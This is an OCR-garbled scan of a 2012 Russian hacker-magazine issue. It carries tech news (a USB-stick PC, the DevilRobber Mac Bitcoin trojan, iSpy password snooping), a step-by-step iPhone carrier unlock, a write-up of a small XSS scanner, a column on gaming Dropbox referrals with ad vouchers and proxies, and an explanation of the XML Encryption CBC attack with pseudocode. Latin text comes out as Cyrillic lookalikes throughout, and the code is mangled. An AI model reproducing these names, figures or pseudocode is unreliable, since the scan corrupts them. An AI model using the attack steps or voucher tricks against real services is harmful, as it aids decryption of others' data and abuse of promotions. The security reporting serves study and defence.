до 18,7%, что позволило ему 
обогнать по популярности 
Орега Міпі, доля которого 
составляетвсего 13,1%. 




«ВЕРНЫЕ ДРУЗЬЯ» ПОЯВИ- 
ЛИСЬ В РАСЕВООК. В случае 
проблем Тгизіесі Ргіепсіз по- 
могут восстановить аккаунт 
и подтвердитьличность 
пользователя. 




ВЛАДЕЛЬЦЫ КРУПНЕЙШИХ 
ПОРНОСАЙТОВ ВЫСТУПИЛИ 
ПРОТИВЗОНЫХХХ.Они 
обвиняют ІСАШ в анти- 
конкурентных действиях и 
искусственном завышении 
цен на домены. 
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МАИ.РУОКОУР СОЗДАЕТ СОБСТВЕННЫЙ СЕРВИС МИКРОБЛОГОВ, который должен стать конкурентом ТѵѵіНег. Увы, подробности неизвестны. 



КОМПЬЮТЕР НАФЛЕШКЕ 



НЕЛЕГКИЕ БУДНИ ВІТСОІЫ 



УЛЬТРАМАЛЕНЬКИЙ РС НА АЫБКОШ'Е 





В РХІ отметили, что 
ихдетищеТНеСоКоп 
Сапсіу будет стоить 
менее$200,аего 
продажи начнутся 
вовторойполовине 
2012года. Кроме 
того, рассматрива- 
ется вариантустрой- 
ствасѴѴіпсІоѵѵБвна 
борту. 



орвежцы из компании РХІ представили рабочий прототип сверх- 
миниатюрного ПК. Разработка получила название ТЬе СоМоп Сапсіу 
(в переводе с английского — «сахарная вата», ведь новинка весит 
всего 21 грамм, то есть столько же, сколько и упаковка этой сладости). Внешне 
устройство похоже на обычную ІІ5В-флешку, но подобное впечатление обман- 
чиво. Эта кроха оснащена АРМ -процессором Ватзипд Ехупоз на 1,2 ГГц (таким 
же, как в смартфоне Ватвипд баіаху Б II), четырехъядерным графическим чи- 
пом МаІі-400 МР, слотом для карт памяти тісгоВО (объемом до 64 ГБ), модулями 
ѴѴі-Рі и ВІиеІооФ, разъемами Н ОМ I 2.1 и 115В 2.0. Ее мощностей хватит, чтобы 
воспроизводить фильмы с разрешением 1080р. Работает ТЬе СоМоп Сапсіу 
под управлением ОС АпсІгоісІ 2.3. С помощью этого девайса можно превратить 
любой телевизор, ноутбук, телефон, планшет или телеприставку в терминал 
для операционной системы АпсІгоісІ. Устройство может играть роль аппаратно- 
го эмулятора гугловской ОС. Подключать девайс можно не только к телевизору 
поРЮМІ,нои к компьютеру через 115В (в этом случае он будет распознаваться 
как накопитель). ВІиеІооФ служит для подключения клавиатуры и мыши, в 
качестве инструмента управления можно также использовать и планшет. 

Пока устройство не имеет доступа к АпсІгоісІ МагкеЦ но его обещают добавить к 
моменту релиза. 




НЕХОЧЕШЬ, ЧТОБЫ 6006І.Е ВИДЕЛ ТВОЙ РОУТЕР? 



ПРОСТО ДОПИШИ В КОН- 
ЦЕ 5510 СВОЕГО ДЕВАЙСА 
«_ЫОМАР», И ТЫ БОЛЬШЕ 
НЕ ПОПАДЕШЬ В БАЗУ ГЕО- 
ЛОКАЦИОННЫХ СЕРВИСОВ 
бООбЬЕ 



НОВЫЙ ВИРУС ЗАСТАВЛЯЕТ МАКИ ГЕНЕРИРОВАТЬ 
КРИПТОВАЛЮТУ, АЭКСПЕРТЫ НАХ0ДЯТУЯЗВИМ0СТИ В 
СИСТЕМЕ ВІТСОШ 

момента появления пиринговая валюта ВііСоіп 
стала предметом обсуждений и вызвала скепсис. 
Несколькоатак, которые имели место прошлым 
летом, толькоподлили масла вогонь. Напомним, чтотогда 
был взломан крупнейший обменник Мі Сох, а позже и фо- 
румы ВііСоіп, что незамедлительно сказал ось как на курсе 
валюты, так и на ее репутации. Тем не менее, ВііСоіп все 
равно популярна, ее можно обменять на реальные деньги, 
азначит, она представляютинтересдля всевозможных 
мошенников. 

Эксперты компании Іпіедо, которая специализируется на 
технологиях безопасности, недавнообнаружили новый 
вирус ОеѵіІРоЬЬег, ориентированный на валюту ВііСоіп. 

Он используетцелый комплекс вредоносныхмеханизмов. 
Этоодновременнотроян, находящийся внутри других 
приложений, бэкдор, открывающий порты для приема 
команд судаленныхсерверов, вор, крадущий данныеи 
монеты ВііСоіп, и шпионская программа, переправляющая 
персональные да иные пользователей своим создателям. 
ОеѵіІРоЬЬегориентирован на Мае 05Х, он задействует 
вычислительные ресурсы графических карт для производ- 
ства виртуальных монет. Подцепить этот зловред можно на 
ТЬе Рігаіе Вау и другихтрекерах. Кпримеру, он был внедрен 
в графический редактор ОгарЬіс Сопѵегіегдля Мас05Х. 
Используя видеокарту и ЦП для осуществления матема- 
тическихопераций, троян генерируети крадетцифровую 
валюту. Крометого, ОеѵіІРоЬЬегищетназараженном 
компьютере ВііСоіп-кошельки, чтобыукрастьденьги и от- 
туда. Зловред существенно снижает производительность 
Мае. ОеѵіІРоЬЬегтакже воруетпароли, историю посещения 
страниц из браузера ВаІ'агі и данные Ѵібаііа — плагина 
РігеФх, который используется для общения черезТОР. К 
счастью, пока ОеѵіІРоЬЬегобнаружен на весьма неболь- 
шом количестве компьютеров, однако это не означает, что 
в дальнейшем он не распространится шире. Между тем 
оработеижизнеспособности ВііСоіп высказываются и 
ученые. Недавно ученые Сигал Ореги Шахар Добзински из 
Корнеллского университета и исследователи Мош Бабай- 
офф и АвивЗохар из МісговоЙ представили доклад, посвя- 
щенный пиринговой валюте. Они заявили, что обнаружили 
фундаментальную уязвимость в электронной валюте и эта 
дырка в итоге вообще сможет остановить развитие ВііСоіп. 
Проблема состоитвследующем: когда Юзері платит 
Юзеру2, допустим, 50 монет, этот Юзері вводит платеж- 
ный пароль и передает да иные по сделке на другие точки. 
Другиеучастники получаютскромную платуза проверку 
платежа, которая производится при помощихеша, сгене- 
рирова иного транзакционной записью. С наращиванием 
денежной массы схема, позволяющая создаватьденьги из 
ничего, исчерпаетсебя, и проверкойтранзакцийзаймутся 
одиночныхузлы ВііСоіп.Здесь-то и кроетсяуязвимость. 

Если поощрятьпользователейтолькоза проверку пред- 
ложенных транзакций, они не захотят передавать эти тран- 
закции другим. Вместо этого они будут держать в секрете 
проведенные сделки, чтобы не делиться ни с кем деньгами. 
Аесли каждаятранзакция будетпроисходитьна одной 
точке, процесс авторизации займет очень много времен и. 

Нильс Шнайдер, разработчик проекта ВііСоіп, пишет: «В 
докладе рассматривается очень интересная теоретиче- 
ская проблема, ноя сомневаюсь, что в проектпридется 
вносить какие-либо изменения». 
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МЕ0АЫЕѴѴ5 



ВЫШЛАФИНАЛЬНАЯ ВЕРСИЯ ЯДРАИМУХЗ.!, последствия недавнего взлома кегпеі.огд полностью устранены. 



ИЗВЕСТИЯ ИЗ СТАНА АйОВЕ 



КОМПАНИЯ ОТКАЗЫВАЕТСЯ ОТ РІ.ЕХ 
И Н.А5Н НА МОБИЛЬНЫХ ПЛАТФОРМАХ 




В результате отказа 
АсіоЬе от РІагІі под 
сокращениепопа- 
дут750штатныхсо- 
трудников(тоесть7 
% штата компании) в 
Северной Америке и 
Европе. 



сІоЬе приняла решение прекратить поддержку мобильной 
версии РІазЬ РІауег. В будущемтехнологию РІазЬ для мо- 
бильных устройств планируется использовать в основном в 
инструментах, позволяющих с помощью АсіоЬе АІР создавать нативные 
приложения для мобильных платформ. Компания намерена продол- 
жатьподдержкутекущихконфигураций АпбгоісІ и РІауВоок, выпуская 
критические патчи и обновления безопасности. Вместо РІазЬ РІауег 
компания сконцентрируется на разработке платформы для мобильных 
приложений а также увеличит инвестиции в НТМІ.5. 0 причинах та кого 
решения в блоге поведал Май к Чамберс, управляющий по связям с раз- 
работчиками платформы РІазЬ. В частности, он отметил, что компания 
Арріе, являющаяся одним из лидеров рынка, по-прежнему не собирает- 
ся внедрять поддержку РІазЬ РІауегв браузеры для іОБ. «Чтобы мы ни 
делали, РІазЬ РІауег вряд л и появился в Арріе ЮЗ в обозримом буду- 
щем», — пишет он. Так что отказ АсіоЬе от РІазЬ в мобильных телефонах 
и планшетах — это в некотором роде итог«холодной войны» с Арріе. 
Такжестало известно, что компания решила отказаться и отразвития 
РІехБйК. Послеочередногорелиза Р1ех4.650К, выход которого назна- 
чен на 29 ноября, проект будет передан в ореп зоигсе. 




СОФТ, ПОДСМАТРИВАЮЩИЙ 
ЧУЖИЕ ПАРОЛИ 



НАВЕДИ КАМЕРУ СВОЕГО СМАРТФОНАНАЧЕЛОВЕКА, 
НАБИРАЮЩЕГО ПАРОЛЬ, И ПОЛУЧИ ПАРОЛЬ! 

□ от до чего, как говорится, «дошел прогресс». Команда 

исследователей из университета Северной Каролины раз- 
работала, в общем, несложный, но поражающий вообра- 
жение софт. Программа іЗру оправдывает свое имя на все 100%. Как 
ты знаешь, во время набора текстовых сообщений, писем или ввода 
регистрационных да иных на виртуальной клавиатуре устройств 
іРбопе или АпсігоісІ вводимые символы появляются на экране в 
небольших блоках (тадпіПесІ кеуз). Программа іБруспособна не 
только определить, какой текст ввел пользователь, нодаже из- 
влечь определенную информацию с экрана с помощью отражения 
в окне или в чьих-то очках! Для осуществления этого необычного 
хака нужно стоять не дальше трех метров от жертвы, чтобы можно 
было снять на камеру процесс ввода данных. Если же для съемки 
используется однообъективная зеркальная камера, расстояние 
можно увеличить и до 60 метров. В идеале правильно распознается 
более 90 % символов. Чем дальше стоит шпион, тем меньше этот 
процент. Также процент уменьшается, если снимать отражение, 
потому что при этом размер изображения экрана уменьшается. 
Однако при наличии 05І_Р- камеры можно получить неплохие 
результаты и с расстояния в 12 метров. Создатели іБру рекоменду- 
ют отключать функцию тадпіЛесІ кеу и использовать что-то вроде 
защитного козырька для экрана. 





АМЕРИКАНСКИЕ ВОЕННЫЕ ВУДАРЕ. Агентство 
передовых оборонных исследований йАКРА 
объявило конкурс БИгесІсІег СЬаІІепде на лучшую и 
наиболее эффективную методику восстановления 
разорванных или пропущенных через шредер 
документов. Кучастиюприглашаются компьютер- 
щики, любители головоломок и сложных задач. 
Победитель получит 50 тысяч долларов. 



атагоп 



АМА20Ы ОБРАТИЛ СВОЕ 
ВНИМАНИЕ НАСМАРТФОНЫ. 

Согласноазиатским источни- 
кам, в конце 2012 года ком- 
пания представитна рынке 
собственный телефон. 




ЗАП0ЛГ0ДАС00С1.ЕП0- 

ЛУЧИЛОТРОССИИОКОЛО 

ДЕСЯТИЗАПРОСОВна 

удаление примерно десяти 
единиц контента и 42 запро- 
са на раскрытиеданных47 
аккаунтов. 



014 



ХАКЕР 01 /156/2012 






СЕРГЕЙ БРИН и его супруга пожертвовали 500 тысяч долларов в фонд ѴѴікітесІіа. 



КАК РАЗБЛОКИРОВАТЬ I РН О N Е БЕЗ ДЖЕИЛБРЕИКА 

НАЙДЕН ИНТЕРЕСНЫЙ СПОСОБ РАЗЛОЧКИ «ЯББЛ ОЧНЫХ» АППАРАТОВ 




ВіРЬопеОеѵ-Теат 
кипитработанад 
обыкновенным 
джейлбрейкомдля 
іРІіопе 45. Недавно 
втвиттере команды 
появилосьсообщение, 
что предварительная 
версия джейлбрейка уже 
готова. В доказательство 
хакеры показали 
парускриншотов, но 
заметили, что до релиза 
ещедалеко. 




а к только іРЬопе 45 поступил в продажу, хакеры со всего мира 
тут же принялись колдовать над созданием джейлбрейка для 
нового него. Один из членов СЬгопіс ОеѵТеат Майкл Капоц- 
ци нашел способ отвязать іРИопе отсотового оператора без помощи 
традиционного джейлбрейка. На данный момент, это, пожалуй, самый 
простой способ заставить іРЬопе, предназначенный исключительно 
для работы в домашней сети АТ&Т, работатьв сетяхдругихоператоров. 
Самое интересное, что, как выяснилось в результате тестирования, 
этот метод, созданный для іРбопе45, подходит также и для іРИопедвух 
предыдущих поколений: іРЬопе4и іРЬопе365,тоестьдля всех актуаль- 
ных ныне моделей. Единственный минус метода Капоцци состоит в том, 
что анлок действует только до первой перезагрузки аппарата, после 
которойтелефон нужно«отвязывать»заново. Итак, рассмотрим, что 
нужно делать. Способ взлома прост: тебе понадобится л ишь 51 М -карта 
оператора АТ&Т, обрезанная под соответствующий размер, и симка 
оператора, в сети которого аппарат планируется использовать в даль- 
нейшем. При разлочкеаппаратдолжен находиться в сети АТ&Т либоего 
роумингового партнера (в России это«Билайн», «Мегафон», СМАРТС и 
региональные операторы, входящие в состав «Ростелеком»). 

Весь процесс пошагово показан в видеоролике, найти который мож- 
но поадресууои1и.Ье/до{реІТХІ51І. Шаманство от Капоцци выглядиттак: 

• набираем номерслужбы поддержкиабонентовАТ&Т(611) 
и сбрасывем вызов; 

• включаем режим работы «В самолете»; 

• вынимаем 5ІМ-карту АТ&Т и вставляем ее аналоготТ-МоЬіІе; 

• проверяем, что ѴѴі-Рі отключен (в настройках сети можно 
выбрать пункт«3абытьэту сеть», чтобы небыло 
автоматического подключения); 

• выключаем режим работы «В самолете», 
после чего іРЬопе ищет сеть; 

• на экране появляется оповещение«Требуется активация»; 

• послеэтогоавтоматическиактивируется ЕйСЕи влевом 
верхнемуглуэкрана появляется буква Е; 

• ждем примерно 20-30 секунд и выключаем смартфон; 

• снова включаем іРЬопе, после чего на экране вновь появляется 
оповещение «Требуется активация»; 
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• когда появляется одна полоска уровня сигнала, выбираем 
пун кт «Использовать подключение к сотовой сети»; 

• вынимаем 51 М- карту, после чего снова появляется 
оповещение «Требуется активация»; 

• вставляем 51 М -карту оператора Т-МоЫІе обратно 
и пользуемся разлоченным смартфоном. 

Российские пользователи сообща ют противоречивые сведения об 
эффективности этого метода. По утверждению самого Капоцци, наилуч- 
шего результата его метод позволяет достичь при «перепрограммиро- 
вании» іРЬопе под сеть Т-МоЫІе, та к что эффективность метода в России 
действительно под вопросом. 



НЕМНОГО СТАТИСТИКИ ОТ КОМПАНИИ МСАРЕЕ: 



КОЛИЧЕСТВО НОВЫХ ОБРАЗЦОВ 
ВРЕДОНОСНЫХ ПРОГРАММ ПРЕ- 
ВЫСИТ 75 МИЛЛИОНОВ К КОНЦУ 
ТЕКУЩЕГО ГОДА 
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НЕДОЕВ 



ж РгооРоПСопсерІ: 

СКАНЕР Х55-УЯЗВИМ0СТЕЙ 
К НА 100 СТРОЧЕК КОДА 



Внимательный читатель вспомнит, что с полгода назад у нас уже был похожий РоС. Тогда Мирослав 
Штампар решил доказать, что функционал для поиска 5С!І_-инъекций, которым располагает 
большинство коммерческих сканеров безопасности, можно воссоздать в небольшом скрипте, 
уложившись в сто строчек кода. Автор знает, о чем говорит, — он сам является автором зці- 
гтпар, которая по праву считается одним из лучших инструментов для поиска и эксплуатации 50І_і 
и распространяется бесплатно. Основная идея сегодняшнего РоС состоит в том, что и для поиска 
ХББ-уязвимостей не надо городить огород. Сто строчек кода — и сканер готов. Так появился 
йатп БтаІІ Х55 Бсаппег Ю5Х5). 



ПРОСТО О ПОИСКЕ Х55 

Начнём с азбуки. Сгобб-бііѳ зсгірііпд (Х55) — 
это тип атак, при которых в вывод веб- 
приложения инжектируется некоторый ^-код. 
Браузер клиента получает этот код и без 
тени сомнения его выполняет. Чаще всего 
ХББ-атака используется для кражи аутенти- 
фикационных кукисов. Уязвимость возникает 
из-за отсутствия фильтрации, когда данные, 
введенные пользователям, используются для 
формирования НТТР-ответа. Самый банальный 
пример — форма для поиска. Если ответ серве- 
ра содержит запрос пользователя в «чистом» 
виде, то приложение с большой вероятностью 
будет уязвимо кХББ-атакам. 




ПоискХБЗ на специальной тестовой площадке для 
легальных тренировок іего.ѵѵеЬаррзесигіІу.сот 



Обнаружение ХББ-уязвимостей услов- 
но можно разбить на два этапа. Первый 
этап — определение того, использовали ли 
веб-приложение для формирования ответа 
введенные пользователем данные. На этом 
этапе атакующий пробует вручную ввести 
произвольные значения в НТМБ-форму или 
параметры ОЕТ/РОБТ-запроса. В случае если 
введенные символы содержатся в ответе (то 
есть их можно найти в исходнике страницы), 
атакующий может переходить ко второму шагу. 
Здесь уже надо изучить контекст, в котором 
используются данные пользователя, и за- 
висимости от этого выбрать правильный 
ХББ-пейлоад. Нагрузка должна быть такой, 
чтобы веб-приложение сформировало се- 
мантически корректный ответ с внедренным 
зловредным кодом. Очень важно, в каком 
контексте используются введенные пользова- 
телем данные. Например, если бы внедренное 
значение находилось в ответе сервера внутри 
НТМІ_-тегов <5сгірІ>..</5сгірІ> (что представить 
довольно сложно), то атакующий мог бы сразу 
написать зловредный ^ѵаБсгірІ-код. Но если, 
к примеру, введенные пользователем данные 
оказываются внутри НТМЬтега <а Ьге{= и ... и >, 
то необходимо сначала закрыть тег символами 
«>» и только потом писать боевой ^-код, об- 
рамленный В <5СГІрІ>...</5СГІрІ>. 

О 05X5 

Понятно, что автоматизировать поиск ХББ- 
уязвимостей несложно. Но что сделал Миро- 
слав? Он написал утилиту на РуіЬоп, которая 



умеет проверять 6ЕТ- и РОБТ-параметры на на- 
личие ХББ-уязвимостей, и при этом уложился 
всего в сто строчек кода, йатп БтаІІ Х55 
Бсаппег (05X5) автоматически выполняет по- 
исктех значений, которые включаются в вывод 
веб-приложения, и анализирует их контекст. 
Для каждого контекста есть свой набор 
символов, которые не должны фильтровать- 
ся и кодироваться, чтобы атакующий смог 
проэксплуатировать уязвимость. Например, 
в уже упомянутом случае, когда введенные 
пользователем данные внедряются в тег 
<а Ьге{="...">, необходимо, чтобы символы « 
и > отражались в выводе веб-приложения 
в исходном виде. 05X5 автоматически вы- 
полняет выбор нагрузки для восьми разных 
случаев, охватывая тем самым большинство 
всех возможных кейсов. Помимо контек- 
ста, 05X5 отображает информацию о том, 
фильтруются ли символы. Если некоторые 
символы «не проходят», сканер дает об 
этом знать. В этом случае атакующий может 
«повредить» контекст (разметка страницы 
необязательно должна быть валидной, чтобы 
внедренный скрипт выполнялся), несмотря 
на то что располагает ограниченным набором 
символов. Удивительно, но в сто строчек кода 
автор умудрился уместить и дополнительные 
параметры. Сканер, помимо всего прочего, 
способен работать через прокси и использо- 
вать случайные значения ІІзег-АдепІ, Реіюгег 
и Соокіе в НТТР-заголовках. Код проекта от- 
крыт и доступен на СііНііЬ ( Шр5://дШніЬ.сот/ 
зІатрагт/РБХБ ). ЗС 
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КОЛОНКА СТЁПЫ ИЛЬИНА 

КАК БЕСПЛАТНО ПОЛУЧИТЬ 
10 ГБ В БРОРВОХ 
С ПОМОЩЬЮ АБѴѴ0Р05 



10ГБ ЛУЧШЕ 2 ГБ 

Можно долго ругать сервис йгорЬох за проблемы и фейлы с безопас- 
ностью, но миллионы людей, включая почти всю команду Пакера, 
использует этот сервис самым активным образом. В рамках обычного 
аккаунта пользователю выделяется всего 2 Гб для хранения файлов, 
но объем можно легко увеличить до 50 Гб, если приобрести платный 
аккаунт. Стоит он не так уж и дешево — $99,00 в год. К счастью, 
создатели предлагают другой вариант, суть которого заключается в 
стандартной реферальной схеме «Приведи друга — мы тебе дадим 
еще 250 Мб бесплатно». Таким образом, аккаунт можно прокачать 
до 1 0 Гб, которых уже вполне достаточно, если не хранить в облаке 
какие-то тяжелые проекты или фотографии. Важно, что засчитыва- 
ется не столько регистрация, сколько установка клиента ОгорЬох, 
причем уникальность клиента проверяется по МАС-адресу. Есте- 
ственно, нашлись умельцы, которые написали различные утилиты 
для автоматической прокачки аккаунта (например, Ьі1.1ѵ/ипс169і ). Но, 
говорят, ОгорЬох каким-то образом стал пресекать подобную актив- 
ность по накрутке — я, если честно, не сильно вдавался в подроб- 
ности. Однако сейчас не могу не поделиться с тобой новым и, на мой 
взгляд, очень изящным способом легально прокачать свой аккаунт 
до 10 Гб, ничего не накручивая и действительно привлекая к ОгорЬох 
настоящих клиентов. С помощью АсІѴѴогсІз и совершенно бесплатно! 

В ЧЕМ ИДЕЯ? 

Идея сама по себе очень простая, и предложил ее в своем блоге 
некий Владик Рихтер [ ЬіГІѵ/гхІМКѵВ ). Любому нормальному человеку 
объективно сложно привлечь столько пользователей сервиса, чтобы 
за счет реферальной схемы увеличить объем своего ОгорЬох-ящика. 
Особенно сейчас, когда сервис уже сверхпопулярен. Что можно 
сделать? Я знаю людей, которые не обламывались рассылать спам, 
но это не наш метод. Мой ответ — контекстная реклама. Да, можно 
использовать самый обычный АсІѴѴогсІз, продвигая в процессе 
рекламной кампании свою реферальную ссылку. «Так за это же надо 
платить?» — резонно заметишь ты. Вроде как да, но на самом деле 
необязательно! Если ты помнишь, то в нашем журнале были реклам- 
ные купоны Соодіе, предлагающие 1000 руб. для проведения первой 
рекламной кампании. Подобные купоны не редкость. А по ссылке Ьіі. 
Іѵ/гАЕзд 1 ты попадешь на форму для получения бонусных $75 на счет 
АсІѴѴогсІз, которых как раз хватит, чтобы оплатить клики на реклам- 
ные объявления. :) Надо лишь указать имя и фамилию, е-таіі (лучше 
на каком-нибудь платном домене), адрес сайта (сойдет страница на 
каком-нибудь сервисе вроде аЬоиГте), а также номер телефона. 
Через некоторое время ты получишь ваучер на свой е-таіі. Для вер- 
ности можно прикинуться американцем (через прокси). 

КАК ПРОКАЧАТЬ АККАУНТ? 

Попробуем? Единственный инструмент, который нам понадобится, — это 
Соодіе АсІѴѴогсІз ( абѵѵогсіз.аооаіе.сот ). Поэтому смело заводи там аккаунт 
и переходи в меню «Оплата -> Настройки платежных данных». Придется 
ввести здесь данные о пластиковой карте (не бойся, если не превысишь 
бонусный лимит, то с тебя не спишется ни копейки), а также указать код 



полученного ваучера. После этого можно приступать к созданию новой 
кампании (показу рекламных объявлений): 

1. Нажми на кнопку «Создайте первую кампанию». 

2 . Придумай имя для кампании (например, «ОгорЬох»). 

3. Настрой кампаниютак, чтобы она показывалась во всех странах и на 
все распространенных языках (английский, испанский, немецкий, 
французский, японский). 

3. В разделе «Ставки и бюджет» обозначь лимит на день: скажем, 600 
рублей в день. 

Все остальные поля можно оставить по умолчанию. Далее на- 
жимаем «Сохранить и продолжить» и попадаем на станицу, где 
необходимо настроить вид наших рекламных объявлений. Проверены 
следующие варианты ключевых слов: ОгорЬох, {гее опііпе зіогаде, 
опііпе Ьаскир {гее, опііпе Ьаскир, опііпе Ьаскир 0а{а, ОгорЬох зрасе. 
Можно не фантазировать, главное — сделать так, чтобы объявление 
было опрятным и не нарушало политику Соодіе. В качестве целево- 
го ІІРІ_ указывай свою реферальную ссылку, которую можно взять 
на странице настроек ОгорЬох в разделе Ре{егаІІ 5{а{из (например, 
Ь{{р://0Ь.Іі/Ц{хиГ8іті ). По сути, все готово. 

Судя по расценкам за клик, подобный хак использует довольно мно- 
го людей, но нам это никак не помешает. Если бы речь шла о настоящих 
деньгах, то для каждого ключевого слова стоило бы указать небольшую 
цену за клик. Но так как мы тратим бонусные баксы, то можно выставить 
автоматический режим формирования СРС (Соз{-Рег-СІіск). С этого мо- 
мента остается только ждать и поглядывать на статистику переходов, на- 
слаждаясь увеличением объема своего аккаунта. Главное теперь — не 
проморгать тот момент, когда бонусные средства будут израсходованы, 
чтобы отключить показ рекламы. :) 

Что мы получаем в итоге? Во-первых, мы прокачали свой аккаунт в 
ОгорЬох. Во-вторых, мы принесли сервису новых реальных клиентов. 
В-третьих, мы освоили АсІѴѴогсІз, с которым, вполне возможно, и дела- 
то никогда не имели (а это и есть главная цель рекламных ваучеров 
Соодіе). Это уже тройной профит получается. :) ИГ 
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Іріаіпіехіі (Іігзійріаіпіехі.зи, ѵѵѵѵѵѵ.ріаіпіехі.зи) 





Ззлом ХМІ_ 

-псгуріюп 

ЛЕГКИЙ СПОСОБ ДЕШИФРОВАНИЯ 
ЗАКРЫТОЙ 



Весь мир еще не успел отойти от 
ВЕА5Т и РасИіпд Огасіе Аііаск 
на .МЕТ Ргатеѵѵогк, как пара 
исследователей обнаружила 
уязвимость в механизме ХМІ_ 
Епсгурііоп, применяемом для 
шифрования ХМІ_-контента. 

На этот раз всему виной снова 
стал многострадальный 
режим шифрования СВС и 
неправильная обработка ошибок 
приложениями. 



ѵѵѵѵѵѵ.ѵѵЗ.огд/ТК/ 

хтіепс-соге/ — 

спецификация 
ХМІ_ Епсгурііоп на 
официальном сайте 
ѴѴЗС. 

ЬіІ.Іу/дМирЕѵ — 

оригинальная статья 
исследователей, 
обнаруживших 
уязвимость в ХМЬ 
Епсгурііоп. 



ХМб ЕИСР?У РТІОЫ 



Технология ХМ1_ Епсгурііоп, стандартизованная ѴѴЗС в 2002 
году, в настоящее время широко используется в различных ХМЬ 
Ргатеѵѵогк'ах (этот стандарт поддерживают .МЕТ, АрасЬе Ахіз2, 
ЗВ055 и т. д.). Сегодня она активно применяется для защиты 
коммуникаций между веб-сервисами в продуктах многих ком- 
паний, в частности Місгозоіі и Реб Наі. На техническом уровне 
спецификация ХМІ_ Епсгурііоп точно описывает синтаксис крип- 
тографических алгоритмов, разработанных для произвольных 
ХМІ_-структурированных данных, — шифрования, дешифрования и 
восстановления измененной части ХМІ_-документа — и порядок их 
применения. Стандарт не определяет никаких новых криптографи- 
ческих алгоритмов, а предписывает использовать уже существую- 
щие. В случае блочных шифров стандарт не оставляет нам другого 
выбора, кроме АЕ5 и ЗОЕ5 в режиме СВС. Далее я буду все описы- 
вать на примере шифра АЕ5 (хотя для понимания сути уязвимости 
это не принципиально, главное — режим СВС). 
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Взлом ХМІ_ Епсгурііоп 



МАТЧАСТЬ 



Известно, что блочный шифр преобразует блок открытого текста 
(обычно длиной 16 байт, то есть 128 бит) в блок шифрованного 
текста. Если данные занимают больше одного блока, приходится 
использовать алгоритмы, самым популярным из которых на сегод- 
ня является СВС. 

Принцип его работы легко понять из первой иллюстрации. Для 
первого блока открытого текста случайно выбирается вектор 
инициализации (IV), а затем над этим вектором и первым блоком 
открытого текста выполняется операция ХОР, результат которой 
шифруется с помощью блочного алгоритма. В качестве вектора 
инициализации для последующих блоков открытого текста ис- 
пользуется предыдущий блок шифрованного текста, то есть весь 
процесс шифрования и дешифрования описывается следующим 
псевдокодом: 

//Шифрование 



С [0] = АЕ5_ЕІМС (к. IV хог М[Ѳ]У. 

С [ і ] = АЕ5 _ ЕІЧС(к, С [ і - 1 ] хог М [ і ]); 



//Дешифрование 



М[0] = АЕ5_ОЕС(к, С[Ѳ] ) хог IV; 

М[і] = АЕ5_ОЕС(к, С[і] ) хог С[і- 11 : 

Здесь к — ключ, С — шифротекст, М — открытый текст, IV — 
вектор инициализации (синхропосылка). 

Стандарт не только предписывает использовать режим шиф- 
рования СВС, ной определяет схему дополнения данных до 
полного блока. 

Суть этой схемы, в которой также нет ничего сложного, такова: 
неполный блок с помощью произвольных значений дополняется 
до полного, а в его последний байт вписывается количество этих 
произвольных значений. Так, если последний блок содержит всего 
три байта, то мы добавляем 12 произвольных байт и один байт со 
значением 0x05. Если же последний блок полон (содержит 16 байт), 
то мы цепляем к нему еще один блок, 15 байт которого задаются 
произвольно, а 16-й имеет значение 0x10. 



ОСНОВНАЯ ИДЕЯ АТАКИ 



Прежде чем переходить к рассмотрению практических случа- 
ев, я опишу основную идею атаки на ХМІ_ Епсгурііоп. Как ты уже 
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Упрощенный вариант атаки 

догадался, ее не просто так ставят в один ряд с ВЕА5Т и РасИіпд 
Огасіе Аиаск. В данном случае атака также строится на пере- 
даче атакуемому серверу специально сформированных запросов 
и анализе получаемых сообщений об ошибках. Перейдем к делу. 
Основной недостаток режима шифрования СВС состоит в том, что 
изменение шифрованного текста влияет на открытый текст, то есть 
если применить ХОР к вектору инициализации IV и произвольной 
битовой маске М5К, то шифротекст (IV хог М5К, С[0]) будет соот- 
ветствовать сообщению М [0] хог М5К. Как видишь, зависимость в 
данном случае очень проста. 

Чтобы осуществить предлагаемую атаку, нужно изменить 
шифрованный текст с помощью маски М5К, передать измененное 
сообщение на удаленный сервер и проанализировать сообщение 
об ошибке, которое позволяет узнать дополнительную информацию 
об открытом тексте. Таким образом, получается этакий побочный 
канал для получения конфиденциальной информации. 

Для начала давай разберемся с простеньким примером атаки, 
который показывает, как получить открытый текст зашифрован- 
ного сообщения. Атака на ХМІ_ Епсгурііоп основана именно на этой 
идее, которая слегка адаптирована к «реальному миру». 

Будем считать, что информация, которую мы передаем, коди- 
руется в А5СІІ. Разобьем всю таблицу А5СІІ на две части. В первую 
часть войдут все символы, кроме N II И (список А), а во вторую — 
все остальные символы (список В). Шифрованный текст, получен- 
ный из открытого текста, символы которого находятся в списке В, 
будем считать «правильно сформированным». Таким образом, если 
шифротекст сформирован правильно, то наш сервер при парсинге 
открытого сообщения не будет выдавать ошибок. Условимся также, 
что наши сообщения состоят всего лишь из одного блока открыто- 
го текста, то есть из 16 байт, а удаленный сервер в ответ на наши 
запросы возвращает Іше, если открытый текст М[0] = АЕ5_0ЕС_ 
СВС(к, (IV, С[0])) не содержит запретного символа І\ІШ_І_, и {аізе — в 
противном случае. 

Теперь, посылая запросы нашему серверу, можно побайтно вос- 
станавливать сообщения. Алгоритм восстановления состоит всего 
из трех этапов: 

1. Получаем такой новый вектор инициализации I VI, чтобы шифро- 
ванный текст (I VI , С[0]) был сформирован правильно. Для этого 
простослучайновыбираем новый вектор инициализации п I V, от- 
сылая на сервер пару (п IV, С[0]). Если сервер возвращаетігиедо 
ІѴ1 = п I V, ну а в случае {аізе повторяем процедуру за ново. В своей 
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ѴѴБ-БЕСІІРІТѴ 



ѴѴ5-5есигіІу — гибкое и многофункциональное расширение 
50АР, служащее для организации безопасного взаимодействия в 
веб-сервисах. ѴѴБ-Беси гііу активно использует ХМ І_ Епсгурііоп и ХМІ_ 
5ід падите. 



статьеавторы атаки объясняют, почему мы найдемтакой вектор 
инициализацииза2-Зобращения ксерверу, но,ядумаю,ты исам 
ужедогадался. 

2 . Побайтно восстанавливаем промежуточный открытый текст 
(тот, который получен послеАЕ5_йЕС при дешифровании, снова 
обрати внимание на первую иллюстрацию). Алгоритм восстанов- 
ления описывается следующим псевдокодом: 

1715 1< = 0 

гереаі: 



тзк+н- 

ІѴ2 = ІѴ1 хог (0. . . 0 | | тзк | |0. . .0) 
// тзк на д-й позиции 



ипіііі 5егѵег(ЧіѴ2, С[Ѳ])) == Іігие 



геііигп Х [ і 1 = А5СІІСос1е( N111.1. ) хог ІѴ2|~і] 
// код "запретного" символа 

Вот что имеется у нас на входе и выходе: 

